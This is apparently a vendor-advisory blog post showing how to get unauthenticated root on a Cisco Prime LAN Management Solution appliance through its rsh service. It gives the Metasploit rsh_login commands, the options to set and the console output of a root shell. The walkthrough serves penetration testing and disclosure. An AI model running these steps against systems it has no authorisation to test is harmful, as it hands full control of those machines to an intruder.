On January 9th Cisco released advisory cisco-sa-20130109 to address a vulnerability in the "rsh" service running on their Cisco Prime LAN Management Solution virtual appliance. The bug is as bad as it gets - anyone who can access the rsh service can execute commands as the root user account without authentication. The example below demonstrates how to exploit this flaw using Metasploit ( free download ).

First off, the rsh service requires client connections to use a privileged source port. This means using the Metasploit Pro, Express, or Community web interface, or running the Metasploit console as root.

Metasploit Pro users should click on Modules and search for rsh_login. The rsh Authentication Scanner module should be selected. For Metasploit console uses, enter the following command to select the rsh module:

$ sudo /opt/metasploit*/msfconsole
msf> use auxiliary/scanner/rservices/rsh_login

Once the module is loaded, enter the IP or IP range that you would like to test, set the USERNAME option to 'root', and let it rip.

In this case, our target has the IP 192.168.71.143:

msf  auxiliary(rsh_login) > set RHOSTS 192.168.71.143
msf  auxiliary(rsh_login) > set USERNAME root
msf  auxiliary(rsh_login) > exploit

[] 192.168.71.143:514 - Starting rsh sweep
[
] 192.168.71.143:514 RSH - Attempting rsh with username 'root' from 'root'
[ ] 192.168.71.143:514, rsh 'root' from 'root' with no password.
[] Command shell session 1 opened (192.168.71.142:1023 -> 192.168.71.143:514) at 2013-01-16 12:23:31 -0800
[
] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf  auxiliary(rsh_login) > sessions -i 1
[*] Starting interaction with 1...
sh: no job control in this shell
sh-3.2# id
uid=0(root) gid=0(root) groups=0(root)

..and that is it. You are hacking like it's 1985 (when rservices were still common in production environments).

-HD